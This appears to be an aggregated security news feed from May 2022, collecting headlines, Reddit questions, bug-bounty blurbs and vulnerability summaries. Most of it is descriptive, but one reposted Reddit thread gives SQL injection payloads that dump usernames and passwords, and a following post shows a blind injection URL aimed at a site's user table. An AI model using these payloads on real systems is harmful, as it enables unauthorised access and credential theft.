    Author: HuanGMz @ 知道创宇404实验室 (Knownsec 404 Team). Date: May 20, 2022. 1. Vulnerability overview: More than a month has passed since the high-severity vulnerability CVE-2022-26809 was patched in April 2022, and in that time, apart from an analysis by L1nk of the trigger conditions of the vulnerable function GetCoalescedBuffer(), there has been no other news. On my side I have worked out the trigger logic of the vulnerable function ProcessReceivedPDU(), but have been unable, on a default sys...


    Wiping a lot of SSDs
    I work in corporate legal doing e-discovery work. The end of the process for most of my cases involves destruction of the collected data. I've been using DBAN to wipe spinning rust drives for years, as well as SSDs as they started to replace HDDs. The newer laptops with UEFI and no legacy boot make using DBAN challenging. When DBAN didn't work, I'd connect it through a USB adapter, boot into Linux, mount it RW, and just sudo dc3dd wipe=/dev/sdc. A few months ago, a co-worker pointed out that an SSD might move data into an overwritten sector while the wipe is in process, meaning that with these processes, we can't be sure that all data's been wiped. We've got two cases that might wrap up in the next few months where I've collected 100+ M.2 2280 SSDs. Most (but not all) of the drives are BitLocker encrypted. In theory I could just clear my hands like a blackjack dealer and say "not my problem; keyless encryption is as good as wiping," but 1) I'm not certain every drive is encrypted, and 2) I'm not certain BitLocker protects everything (boot sector? MFTs?) in an unretrievable manner. Some of the data… We could also toss them in a box for Iron Mountain to deal with, but for "reasons" (i.e., some data should pass through as few hands as possible) we'd prefer to know that it's done internally and not handed off to an outside vendor. Physical destruction is an option, but burning through a few thousand dollars in otherwise usable SSDs feels like a waste. These SSDs are all from Dell laptops, but have various SSD manufacturers, including Intel, Lite-On, Samsung, Toshiba, SanDisk, and SK Hynix. I might be able to budget several hundred dollars for hardware or software, but this isn't the kind of thing that I need to do more than once every few years, so a costly one-time solution isn't a good option (compared to swapping out SSDs one at a time in my free time for the next year or so). What approach would you take in this situation? submitted by /u/RulesLawyer42
    plaso timeline analysis
    I'm new to plaso. I know how to create one, but I don't know how it can be helpful or where to look when I want to know when a backdoor file was created, whether the antivirus detected a malicious file, or the creation time of a backdoor registry key. Are there some examples that might help make things clear? submitted by /u/sk8er_girl90
    PST search tool
    Any good programs where I can import a PST and do searches, tag, and export those tags to PST? submitted by /u/theedon323
    Trying to play security camera footage from 2004. It's going as well as you'd expect.
    I'm trying to extract video footage that was downloaded from an unknown security system back in 2004. The files were originally on an Iomega 100MB Zip drive, if anyone remembers those things. I transferred the files to my laptop, and in the folder there was included a program called "Image Vault Viewer" (IVViewer.exe), which I assume is supposed to be the player application. (I had to open it in XP Compatibility Mode to get it to run.) When I choose to open a file from the application interface, I'm only allowed to select one file type (.cls) and I get an error as shown in the video. I recorded my screen so you can see all the different file types in the folder, as well as the error when trying to open something. A note: the (.vls) files show as being associated with IVViewer because I tried to open them with that program. That didn't work. You'll also see an "Ableton Live Set" (.als) file, but that's probably because I have Ableton audio installed on my laptop. I'm sure that 18 years ago the (.als) file extension was associated with something else. Can anyone give me some tips here? The video files show a murder occurring. The suspect was on the run for years and was just recently caught, but technology has advanced so much since then that this older stuff is really hard to work with. Thanks! https://reddit.com/link/ut3z7z/video/no7r4aujsf091/player submitted by /u/YabbaDabbaDoofus
    Snapchat Forensics on smartphones
    Hi, fellow experts. I've been testing Snapchat's features and have a few questions to ask: Is it possible to recover Snapchat text messages (not images & videos) on Android and Apple smartphones? I can see images under the Snapchat file folder on the phone. Is it possible to know who sent them (Snapchat username)? I'm having a hard time determining the correlation between the XML record and the actual image. Is there a sure way to determine who sent what? submitted by /u/Dreamlad
    Digital Forensics Masterclass
    submitted by /u/cybersocdm

    Rolling Thunder is a Go
    How Ottawa’s War Memorial is becoming a symbol of polarization and division Continue reading on Medium »
    War in Ukraine / May 18
    The Russian army reduced the offensive Continue reading on Medium »
    One day in a life of OSINT geek: how Data Lookup helps to learn a lot in a couple of clicks
    We are actively developing our online Data Lookup tool, as more and more users tend to fulfill their OSINT tasks using quick and simple… Continue reading on Medium »
    Find anything online with Google dorks — part 1
    Google dorks are a fantastic way to quickly filter search results and find an absolute treasure trove of information online. By simply… Continue reading on Medium »
    My Telegram investigation toolkit…
    Hooray, my channel has exceeded 200 subscribers… As promised, I am posting my selection of sources intended for investigations in Telegram… Continue reading on Medium »

    Bug Bounty Diaries #2
    Hi guys! I’m back with a new blog and this is great because again… I learn a lot of things, especially about DNS, IP and things like that. Continue reading on Medium »
    A Story of DOM XSS
    Good day, everyone! This is my second article, this time on DOM XSS. An open redirection vulnerability was escalated to DOM XSS. If you… Continue reading on Medium »
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    Hello everyone, I am Hac and today we are doing Cyber Apocalypse CTF 2022, specifically these challenges: Continue reading on InfoSec Write-ups »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on CoinsBench »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on Medium »
    How I was able to access IBM internal documents
    Hi, today I will share how I was able to access internal data of https://weathercommunity.ibm.com using a Salesforce misconfiguration. Continue reading on Medium »
    From Wayback to Account Takeover
    Hi, I would like to share how the Wayback Machine leads to a limited Account Takeover. Continue reading on Medium »
    CRLF (%0D%0A) Injection
    Hello Guys! I am Vasu, a bug bounty researcher. Continue reading on Medium »
    How I Got $1083 worth of book bundle for just $1 — #Bugbounty
    Price manipulation at checkout: Continue reading on Medium »
    How I Exploited 4 Vulnerabilities In A Website
    This blog is for informational purposes only, so that emerging bug hunters can follow a similar methodology and responsibly disclose… Continue reading on Medium »
    A pragmatic guide to building your bug bounty program
    Part 1: Getting set up, and maintaining your program Continue reading on Airwallex Engineering »

    Scam and Malicious APK targeting Malaysian: MyMaidKL Technical Analysis
    submitted by /u/Rempah
    Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices
    submitted by /u/SCI_Rusher
    Exploiting an Unbounded memcpy in a Guest-to-Host escape of Parallels Desktop
    submitted by /u/gaasedelen
    Killnet Attacks Against Italy and NATO Countries
    submitted by /u/MiguelHzBz

    Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
    We discuss XLL and XLM droppers that deliver Dridex samples. We cover examples of the Dridex infection chain. The post Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies appeared first on Unit42.

    [Security Advisory] VMware authentication bypass vulnerability (CVE-2022-22972)
    Recently, VMware published a security advisory fixing a high-severity authentication bypass vulnerability affecting the Workspace ONE Access, Identity Manager and vRealize Automation products. Currently...

    How Dual Messenger technically works on Samsung devices
    I know that Android OS is a privilege-separated OS in which each application has a separate /data folder in which it writes and each app has its own PID. With that mentioned, I believe that my question's answer can easily be observed through a rooted device, i.e. how an applied dual messenger is structured, its folders etc. Do these two apps (the original and the clone) share the same storage? Could anyone give technical detail on how this works? Thanks submitted by /u/Camera-Soft
    Does a DNS enabled "gray-net", akin to the dark net w/ onion sites, exist?
    Question spawned from: https://www.reddit.com/r/degoogle/comments/usi7w7/protonmail_ios_android_mobile_apps_sending/i97bt4a/ https://www.reddit.com/r/privacy/comments/uscrg2/protonmail_app_on_ios_regularly_talking_to_google/ https://www.reddit.com/r/ProtonMail/comments/uscbnz/protonmail_app_on_ios_constantly_talking_to/i93is94/ tl;dr - Proton GitHub source code for a few of their different apps references the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Traditional ping & nslookup do not find the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Using a tool that can do DoH to Quad9, dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz resolves to dayana.ns.cloudflare.com. I'm not a DNS wizard, so I'm not sure if I'm understanding this right, so call me out: is it possible for 3rd party DNS providers to have hosts that resolve only through that 3rd party, and only over DoH vs traditional DNS? I.e. a "gray net" that's only resolvable via certain DNS methods? submitted by /u/SOsint
    Unable to install VirtualBox NDIS6 Bridged Networking Driver.
    Hello, I am having trouble installing the NDIS6 Bridged Networking Driver. I tried to install the program in the title in my environment and got the message "The requested functionality was not found. The specified module cannot be found" and I cannot install it. I have no idea which module to install, etc., so I would like to know the solution. submitted by /u/Awkward_String139
    deleted post with solutions: 'Hi, code injection help please'
    Hi, I'm typing 1' or '1'='1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: There was error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 The server version is: Apache/2.4.41 (Ubuntu) and I found that it is version MariaDB-5.5.41. How can I find the right syntax? Thanks SOLUTIONS: It worked with typing only ' OR 1=1; # for showing all the persons in the database, and ' UNION SELECT null, username, password FROM users # to find all the usernames and passwords in the database. submitted by /u/Traditional_Bird_877
    Help with blind SQL injection please
    Hello, I need to get the usernames and passwords from an Online Auction System: http://www.blabla.com/index.php?product=Chair I've tried injecting this but no results: /index.php?product=select%20username,%20password%20from%20users%20where%20product=Chair%20and%201%3D1%20%23 Can I have some help? Thanks submitted by /u/Traditional_Bird_877
    Cannot create host-only adapter on VirtualBox
    I am unable to create a host-only adapter. I am using version 6.1.22. The following is the error message. Querying NetCfgInstanceId failed (0x00000002). Exit code : E_FAIL (0x80004005) Component: HostNetworkInterfaceWrap Interface: IHostNetworkInterface {455f8c45-44a0-a470-ba20-27890b96dba9} submitted by /u/Awkward_String139

    8x8pilot.com: Reflected XSS in Apache Tomcat /jsp-examples example directory
    8x8 disclosed a bug submitted by huntinex: https://hackerone.com/reports/1400357
    Stored XSS in repository file viewer
    GitLab disclosed a bug submitted by kannthu: https://hackerone.com/reports/1072868 - Bounty: $2000
    Email html Injection
    Slack disclosed a bug submitted by smitgharat0001: https://hackerone.com/reports/1461194 - Bounty: $250
    XSS and iframe injection on tiktok ads portal using redirect params
    TikTok disclosed a bug submitted by cancerz: https://hackerone.com/reports/1514554 - Bounty: $1000

    SecWiki News 2022-05-19 Review
    Wobfuscator: converting parts of malicious JavaScript code to WebAssembly to evade detection, by ourren. Draft technical guide to infrastructure security resilience (firmware security chapter), by ourren. For more of the latest articles, visit SecWiki.

    Disclosure of Top Vulnerability
    Article URL: https://hackerone.com/reports/397031 Comments URL: https://news.ycombinator.com/item?id=31436248 Points: 1 # Comments: 0

    OSS-Fuzz: Continuous Fuzzing for Open Source Software
    Article URL: https://google.github.io/oss-fuzz/ Comments URL: https://news.ycombinator.com/item?id=31435504 Points: 2 # Comments: 0

    Java deserialization basics 01: deserialization concepts and exploitation
    I'm writing this article to go over the basics of Java deserialization a few more times; after all, every tall building starts from the ground.
    Hands-on "white plus black" AV evasion that anyone can do
    Super practical! Hands-on "white plus black" AV evasion that anyone can do!
    Fake ads cast a wide net: have you been phished?
    Stay alert, stay skeptical.
    FreeBuf Morning Report | Ransom demands surged 45% in 2021; personal information of nearly 2 million Texans exposed for three years
    According to Group-IB data, the average ransom demand in 2021 was $247,000, up 45% from the previous year.
    Step-by-step: implementing a Tomcat memory shell
    Step-by-step: implementing a Tomcat memory shell. Come and learn.
    Zip Slip vulnerability in Xinje PLC programming software: CVE-2021-34605 research
    Xinje PLC programming software V3.5.1 has a Zip Slip vulnerability; when a specially crafted project file is opened, an attacker can gain arbitrary file write.
    Personal information of nearly 2 million Texans exposed for three years
    Recently, due to a programming problem at the Texas Department of Insurance (TDI), the personal information of nearly 2 million Texans was exposed for almost three years.
    Conti gang threatens to overthrow the Costa Rican government
    Recently, the Conti ransomware gang issued a threat to "overthrow" the government of Costa Rica.
    VMware patches critical authentication bypass vulnerabilities in multiple products
    Critical authentication bypass vulnerabilities have appeared in multiple VMware products, allowing attackers to obtain administrator privileges.
    Microsoft: beware of brute-force attacks against MSSQL servers
    Microsoft is issuing a security warning to users of MSSQL database servers: beware of attackers using weak passwords to launch brute-force attacks against MSSQL servers exposed on the network.

    Active Directory Overview
    Unicode from HackTheBox — Detailed Walkthrough

    A new way to bypass `__wakeup()` and build POP chain
    Author: 1nhann. Original link: https://inhann.top/2022/05/17/bypass_wakeup/. Using Laravel 9.1.8 as the example, this article introduces a general new approach to bypassing the __wakeup() encountered while constructing a POP chain. Environment setup: Laravel 9.1.8, routes/web.php : <?php use Illuminate\Suppo...
    CVE-2021-42287 Windows domain privilege escalation vulnerability analysis
    Author: dre4merp. This article is a reader submission; Seebug Paper looks forward to your contributions, and every accepted piece receives a gift! Submission email: paper@seebug.org. Preface: This article analyzes the cause of the vulnerability mainly through debugging Windows Server 2003. Reading it requires some basic knowledge of Kerberos and the ability to read and debug Windows source code; reading alone may not fully explain the key points, which need to be understood through debugging. Background: The vulnerability number is CV...

    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm

    K8s cluster stability: LIST request source-code analysis, performance evaluation, and deployment tuning for large-scale infrastructure services
    For unstructured data storage systems, LIST operations are usually very heavyweight: they not only consume large amounts of disk IO, network bandwidth and CPU, but also affect other requests in the same time window (especially leader-election requests, which have extremely strict response-latency requirements), making them a major killer of cluster stability. For example, in Ceph object storage, every LIST bucket request has to pull the bucket's entire data set from multiple disks; not only is it slow itself, it also affects other ordinary read/write requests in the same period because IO is shared, causing response latency to rise or even time out. If a bucket contains a very large number of objects (for example when used as the storage backend for harbor/docker-registry), the LIST operation may not even complete in a reasonable time (and the registry GC that depends on LIST bucket cannot run either). Another example is the KV store etcd. Compared with Ceph, the amount of data an actual etcd cluster stores may be small (a few to a few tens of GB), small enough even to cache in memory. But unlike Ceph, its number of concurrent requests may be several orders of magnitude higher, for instance when it is the etcd of a ~4000-node k8s cluster. A single LIST request may only need to return tens of MB up to GBs of traffic, but once concurrent requests pile up, etcd clearly cannot cope either, so it is best to have a caching layer in front of it, which is (one of) the functions of the apiserver. Most K8s LIST requests should be absorbed by the apiserver and served from its local cache, but if used improperly they bypass the cache and go straight to etcd, which is a significant stability risk. This article studies in depth the LIST handling logic and performance bottlenecks of the k8s apiserver/etcd, and provides LIST load-testing, deployment and tuning recommendations for infrastructure services to improve the stability of large-scale K8s clusters. kube-apiserver LIST request handling logic: the code is based on v1.24.0, though the basic logic and code paths for 1.19~1.24 are…


    Bug Bounty Diaries #1
    Hi guys! I have a lot of things to say on this blog and the truth is that I didn’t try to exploit anything because WOW!
    Hack First, Bounty Later
    Two months ago we came across an interesting and somewhat provocative Tweet.
    How to Install airixss
    Hello all, we will see how to install airixss on Kali Linux.
    Creo Engine Presents ‘Evermore Knights Bug Bounty Contest’
    Creo Engine is developing its first game called “Evermore Knights” and Creo Engine recognizes the importance of security researchers in…
    Methods to Exploit HTML Injection
    In this article, we will discuss the HTML Injection vulnerability, and 3 methods of how to creatively leverage it for exploitation.

    Anonymous Social Network Yik Yak Breached Precise GPS Locations
    submitted by /u/mkdtsh
    Hack The Box - Timing - Writeup by Mădălin Dogaru
    submitted by /u/Madalin_Dogaru
    Variant Cloud Analysis
    submitted by /u/Gallus
    Wizard Spider hacking group detailed analysis
    submitted by /u/wtfse
    TProxy: Wireshark dissection with manual and scripted interception
    submitted by /u/mexicanw

    Clipboard
    Can websites read/access our entire clipboard contents? I'm scared because I have my passwords, documents (passport/ID), pictures of me, etc. saved on my clipboard. I obviously don't want any website viewing my clipboard...especially not the p*rn, or any unsafe sites I visit, or even those phishing sites I got redirected to. I don't click or enter any login credentials on such sites but obviously do use the search bar. I don't even actually paste anything from my clipboard on these sites, though, let me make that clear. Or do they just see what I copied recently onto my clipboard? Help needed. I'm looking for an accurate and realistic answer and not some conspiracy theories. Thanks. submitted by /u/hamza_x17
    Excel & Power BI for security/data analysis
    Hi. Do you know any courses/blogs where Excel or Power BI are used for data analysis and building cool charts? I very often use Excel to analyze data from Azure/SIEM/network data/user activity: building stats (pivot) or visualising data (any timelines), creating formulas such as "how long the user has been inactive", or parsing data. And I'm interested in additional courses for Excel/Power BI for data analysis to improve my skills. What courses have you used? submitted by /u/athanielx
    What network security monitoring (NSM) product do you know?
    Hi there. I'm looking for NSM products (they can be open-source too). We in the company want to implement NSM. The first option is to organize everything with our own resources on the basis of Zeek & Suricata & ELK (log manager), but I'm afraid it will be difficult to manage and support with our not-large team. So, the second option is to delegate it to a third party. The closest for me was Corelight, but they don't have an agent for our environment. AC-Hunter was interesting for me too, but their main focus is C2 detection and some built-in threat intel, so it's not enough for our NSM. submitted by /u/athanielx
    Analyze MP3 file for viruses
    I understand that MP3 files can contain viruses. Can you please suggest a way to analyze one apart from VirusTotal and other online AV? Thanks submitted by /u/AnotherRedditUsr
    Need Career Advice
    Hi, I've been working as a Java automation tester for one and a half years. I'm not satisfied with my job and salary. I'm more interested in cybersecurity; since last August I have been learning ethical hacking and pentesting principles. I have completed a few basic rooms in THM and starting-point machines in HTB (with help from hints in writeups). I can't quit my job right now, and also I want to switch my domain. How do I get at least an entry-level position in cybersecurity? submitted by /u/sunilprashanthh
    How to land a SOC analyst job without degree
    I need a reality check. All the employers are looking for experienced workers; however, there is no way to gain experience because I can't even land a job. Currently on a helpdesk without any prior security experience. I've been applying for entry-level security jobs since January 2021. It seems really hard to land any entry-level job here without a CS or related degree. Just wondering if there is a way to break through into the security field. If there is any training program or certification that can help me, please advise. submitted by /u/ChillaxJ

    Bypass global deny-lists by wrapping domains using "[]" in https://github.com/stripe/smokescreen
    Stripe disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1528242 - Bounty: $500
    Conduit feed.publish API allows you to spoof other users or make it look like you have access to a restricted object
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1566325 - Bounty: $300

    War in Ukraine / May 17
    The Molfar team sends a daily newsletter about the war in Ukraine.
    GEOINT#1 — Sino-Myanmarese Borders
    During my daily waste of time on Douyin (抖音, the Chinese TikTok), I came across the following video:
    GEOINT#1 — Sino-Burmese Borders
    During my daily waste of time on Douyin (抖音, the Chinese TikTok), I came across the following video:
    Moonshot Team Spotlight #01
    We are pleased to share our new Moonshot Team Spotlight Series.

    SecWiki News 2022-05-18 Review
    Fundamentals of SSTI vulnerabilities by SecIN Community; WeChat mini-program decompilation by ourren; A Graph Kernel-based method for selecting API usage examples by ourren; The Five Eyes alliance's global best cybersecurity guidance by ourren; Getting started quickly with the cloud-native security platform NeuVector by ourren; Cobalt Strike analysis: CS metadata encoding and decoding by ourren; Top 10 cybersecurity vulnerabilities of 2021 & an introduction to the "Lazarus" group by ourren. For more of the latest articles, visit SecWiki

    calculus notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    FreeBuf Morning Report | Conti ransomware gang vows to overthrow a government; Russian hacker group releases video declaring war on 10 countries including the US and Ukraine
    After the Costa Rican government refused to pay the ransom, the Conti ransomware gang claimed responsibility for the attack. Now the Conti ransomware gang is threatening to "overthrow" the country's new government.
    HackMyVM-hostname
    This target machine was released just last week; one of its extraction techniques was quite novel to me, so I wanted to write it down.
    Major vulnerability exposed in smart cars: hackers can drive off with a Tesla in 10 seconds
    The entire attack takes less than 10 seconds to open the car door, and it can be repeated indefinitely.
    NVIDIA fixes ten vulnerabilities in its Windows GPU display driver
    NVIDIA has released security updates for a range of graphics card models.
    Hackers exploit Tatsu WordPress plugin vulnerability in millions of attacks
    Tatsu Builder contains a remote code execution vulnerability, CVE-2021-25094, which hackers are exploiting in large-scale attacks.
    Beware of spyware! Over 200 Play Store apps may be at risk
    Recently, researchers observed more than 200 Android apps spreading a spyware called Facestealer.
    Venezuelan cardiologist charged as the mastermind behind Thanos ransomware
    The US Department of Justice has charged a 55-year-old doctor from Venezuela as the mastermind of the Thanos ransomware, who profited substantially from selling it.
    未来智安: XDR breaks down data silos and reduces ineffective alerts | Cybersecurity New Forces SOLO launch season
    This episode features Mr. Tang Jiajia (唐伽佳), founder and CEO of Beijing 未来智安 Technology Co., Ltd., a newcomer in offensive and defensive security, presenting the topic "A Brief Discussion of XDR Extended Threat Detection and Response".
    A brief discussion of building an enterprise SOAR project
    SOAR has been around for several years, yet many people are still watching from the sidelines. Let's discuss building a SOAR project together.

    Target=“_blank” – the most underestimated vulnerability ever (2021)
    Article URL: https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/ Comments URL: https://news.ycombinator.com/item?id=31421473 Points: 22 # Comments: 4

    Attacking and Defending Active Directory: Bootcamp Review

    The Basics of Subdomain Takeovers

    Nextcloud CVE-2022-24890: A call moderator can indirectly enable user webcams
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-24890 Comments URL: https://news.ycombinator.com/item?id=31419833 Points: 3 # Comments: 0


    USB Devices Redux
    Back in 2005, Cory Altheide and I published the first paper on tracking USB storage devices across Windows systems; at the time, the focus was Windows XP. A lot has happened since then...I know, that's an understatement...as the Windows platform has developed and expanded, initially with Vista, then Windows 7, and even with Windows 10 there have been developments that have come (and gone) just between the various Win10 builds. With respect to USB devices in particular, not long ago, we (the community) became aware that the Microsoft-Windows-DriverFrameworks-UserMode/Operational Event Log contained quite a bit of information (see this post for event IDs to track) that a digital forensic analyst could use to determine if and when USB devices had been connected to (and disconnected from) the…

    Home Firewalls
    What are your favorite small-end firewalls and why? Are there any features or capabilities that you were particularly impressed with? Any lessons learned that can be shared from your experience? submitted by /u/Noah_Ahn
    Burp Suite Arm64 Linux???
    I'm using an M1 MacBook Air and I'm learning Burp Suite with TryHackMe. I use a virtual machine for anything hacking/OSINT related, but the problem is, Burp Suite isn't available for Linux arm64. Should I just switch back to my Mac when I want to use Burp, or just not use it at all? submitted by /u/Puzzleheaded-Bid7382
    What are the fault lines in Cyber Security in 2022?
    Almost every discipline and industry has its fault lines. These are areas where, among experts, there are fundamental disagreements on how a problem should be approached or solved. But what are the fault lines in cyber security in 2022? submitted by /u/astillero
    Looking for what to watch on malware file changes, excerpt in comments
    I was reading this from a site (Minerva Labs) and am wondering: are these file changes things that are logged in Windows? How do you keep track of such fine-tuned changes? "Before executing any malicious code, a couple of anti-emulation techniques are used. First, the malware calls SetFileAttributesA with the parameters “C:\windows\Explorer.exe” and FILE_ATTRIBUTE_NORMAL (0x80) and if the function succeeds the malware will exit. Secondly, the malware calls the function WriteFileGather with the invalid handle 0, and exits if the return value is not 0." submitted by /u/networkalchemy
    Android malware found in personal laptop memory dump
    Hello. I'm a newbie to the security field and I'm looking for advice on how to proceed with a strange situation. As part of a class I used Ramcapturer to dump my memory and analyze it with WinHex. Here is a sample of the strange values I found: talkbacktstakeextraordinaryscreenshotsendurltologblockappdescr_or_urlMonitoringTool:AndroidOS/PhoneSpy.C connectorcontroller beginattack:senddata/hacking/my programs/source/cocoa/zapattack/udpfloodercontroller.hTrojanDropper ±mitmopsmitmserver There are many more, including some for macOS. This dump is after I reinstalled a fresh copy of Windows. Malware scans do not turn anything up. At one point, I believe I was being investigated due to business ties with some white-collar people. At that time I did have an Android, but now I have an iPhone. I believe the laptop was contaminated by contact with either an old router or an old USB stick. Questions: How can I safely analyze and erase the MBR/GPT on my NVMe SSD, since everything was disconnected during reinstall? What programs could give more insight into my RAM? Is it safe to run my OPNsense firewall to see what my network is doing? How about Security Onion on Proxmox? Thanks! submitted by /u/Beneficial-Monk-4165
    CTI
    I am trying to get into CTI as a beginner in cyber. Any recommendations? submitted by /u/knappyboy1
    Weird stuff happening on my laptop.
    Hi! Lately I've been noticing weird stuff happening on my laptop. I haven't been visiting any shady sites or downloading free games. I noticed that my background has changed twice by itself. The first time it changed to some low-resolution picture of the sky, but there were stars drawn on it. The second time it changed to another low-resolution picture, but this time it was a picture of lightning. I can't provide a picture of the two backgrounds because I don't know where they are saved. I also noticed that Chrome is downloading stuff by itself, but I can't see what. I looked at the download history and I can't find anything new. I don't know if this is related, but a while ago an error message appeared on my screen saying that it was having problems downloading an extension for Chrome and it needed my approval to retry the download, but I haven't been downloading any extensions on my laptop. Later that day I wanted to check something on my laptop and there was a message "No bootable device". I would like to know why this happens and I would be very grateful if someone on this subreddit answers my question. Goodbye. :-) submitted by /u/Programmer2009
    Flatpak adequate for this scenario?
    I'm concerned about potentially malicious extensions in my VS Code, and I'm considering Flatpak to mitigate this rather than going the full-blown VM route. My thinking is a bit jumbled on this, though, so I'd like to hear someone else's thought process behind their own security precautions for more sensitive things like VS Code. I'm a student, but I hope to begin freelancing after I acquire adequate skills, so that will be an additional security concern on top of just not wanting my system infected. submitted by /u/NoBuyer49

    BackendTwo — HackTheBox — Writeup
    Hello guys, sorry for uploading late. I didn’t have time, so let’s start talking. Btw this box is a UHC box (Ultimate Hacking Championship)…
    Bug Bounty Diaries #0
    Hi guys, I’m back with another blog and I know it’s been a while, but I’m so excited because with these blogs I’ll explain my way on bug…
    Want to learn Account Takeover? I got you
    Introduction
    CLV Wallet Bug Bounty Campaign
    Reward Pool of 100,000 CLV!
    What hacking is and why it matters!
    When people hear about hacking, there are different connotations to it! But the common interpretations of the term “hacking” in many…
    SQLI — Intro to Databases
    Before we learn about SQL injections, we need to learn more about databases and Structured Query Language (SQL), which databases will…

    Stealing Google Drive OAuth tokens from Dropbox
    submitted by /u/staz0t
    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar
    In hot pursuit of ‘cryware’: Defending hot wallets from attacks
    submitted by /u/SCI_Rusher
    Hacking Swagger-UI - from XSS to account takeovers
    submitted by /u/albinowax
    EMBA v1.0 - Black Hat Singapore Edt. - Version 1.0 of the firmware security analyzer EMBA is released
    submitted by /u/_m-1-k-3_

    What information can we obtain from an email address?
    OSINT techniques
    War in Ukraine / May 16
    The Molfar team sends a daily newsletter about the war in Ukraine.
    The General Theory for Open Source Intelligence in brief (A proposal)
    With the proposal of a “General Theory” for Open Source Intelligence (GT/OSINT) we attempt to formulate an innovative process for the…

    Nighthawk 0.2 - Catch Us If you Can - @MDSecLabs
    submitted by /u/dmchell
    In hot pursuit of ‘cryware’: Defending hot wallets from attacks
    submitted by /u/SCI_Rusher

    SecWiki News 2022-05-17 Review
    The three cores, four elements and one key question of intelligence by ourren. For more of the latest articles, visit SecWiki

    Integer overflow vulnerability
    Glovo disclosed a bug submitted by 0f1c3r: https://hackerone.com/reports/1562515
    [app.lemlist.com] Improper handling of payment lead to bypass payment
    lemlist disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1420697

    Emotet Summary: November 2021 Through January 2022
    We review recent activity from the Emotet malware family, covering changes in Emotet operations since its revival in November 2021. The post Emotet Summary: November 2021 Through January 2022 appeared first on Unit42.

    Law enforcement forensics career transition
    I am currently a digital forensics analyst for law enforcement. I want to transition into cyber/info security, but I am having a hard time understanding what jobs I could apply for. My experience doesn’t really align with much. I’ve been looking at infosec analyst roles. Law enforcement is dead-box forensics: all home computing devices, and we know exactly what we’re looking for. Never do malware analysis and networking stuff. I’ve studied all the domains for Sec+ but haven’t actually paid to sit the exam because I’d rather a company fund it. Any advice? submitted by /u/gofigured21
    Analyzing Page File for Malware
    Hello everyone, I was analyzing a page file for malware. I ran strings to extract the strings from it, and found lots of suspicious strings. I then started looking at the strings on my own host PC for a comparison; upon examining my host's pagefile I found some strings that are suspicious, but nowhere near the amount in comparison to the system I'm examining, and Windows Defender won't allow me to open the text file in Notepad due to a potential virus. I've scanned both pagefile outputs with Malwarebytes and got no hits on them, but when scanning with Windows Defender I get multiple hits for various CVEs and Trojans. So my question is, is this normal when examining pagefiles? I was thinking that it could be something extracted from Windows Defender in the pagefile? submitted by /u/NoImaginationForThis

    Bypassing WAF to Weaponize a Stored XSS
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    What is SSH and How to use it? | With Examples
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)

    linear algebra notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    Analysis and reproduction of the Rari Capital attack
    Author: w2ning. This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted article receives a gift! Submission email: paper@seebug.org. Some preliminary rambling: On April 30, several of Rari Capital's lending pools suffered a flash-loan reentrancy attack, with losses of about $80 million. The vulnerability principle is similar to the fourth Cream hack I analyzed last year, but the attack method is more elegant, hence this article. Root cause of the vulnerability: the bad precedent set by Compound. The veteran DeFi...
    Summary of three malicious price-manipulation attacks
    Author: w2ning. This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted article receives a gift! Submission email: paper@seebug.org. Some preliminary rambling: Below is a summary analysis of three independent attack incidents from the first half of 2022. Although the vulnerability principles differ, they share one thing in common: the attackers no longer rely solely on FlashLoan for a Single-Transaction-Attack (a term I made up myself), but instead pour in real money amounting to...

    FreeBuf Morning Report | UK drafts nuclear cybersecurity strategy; US manufacturing giant attacked by Conti
    A US manufacturing giant was attacked by Conti.
    Zheng Tongzhou (郑同舟) of 360 Advanced Attack and Defense Lab: know the white, guard the black, forge the shield in your heart with the spear in your hand
    Cybersecurity needs offensive and defensive exercises all the more: use that sharp spear to find the weak points in the shield. "Knowing the white, guarding the black", Zheng Tongzhou and the 360 Advanced Attack and Defense Lab are ready and waiting only for the wind to rise.
    Apple issues emergency update to fix a zero-day used to compromise Macs and Watches
    Apple recently released security updates to address a new zero-day vulnerability that hackers could exploit to attack Mac and Apple Watch devices.
    New attack surface exposed on iPhone: malware can run even when it is switched off
    Attackers can tamper with the firmware and load malware onto the Bluetooth chip so that it executes while the iPhone is "off".
    六方云 Security Posture Weekly | Issue 199
    Industry developments at a glance, security incidents in full view
    Ukrainian hacker sentenced to four years in prison for selling stolen credentials on the dark web
    A 28-year-old Ukrainian was sentenced to 4 years in prison for selling login credentials on the dark web.
    HTML attachments remain popular in phishing attacks
    According to research covering the first quarter of 2022, HTML files are still one of the most popular attachment types in phishing attacks.
    With HW around the corner, how is that forgotten physical security doing?
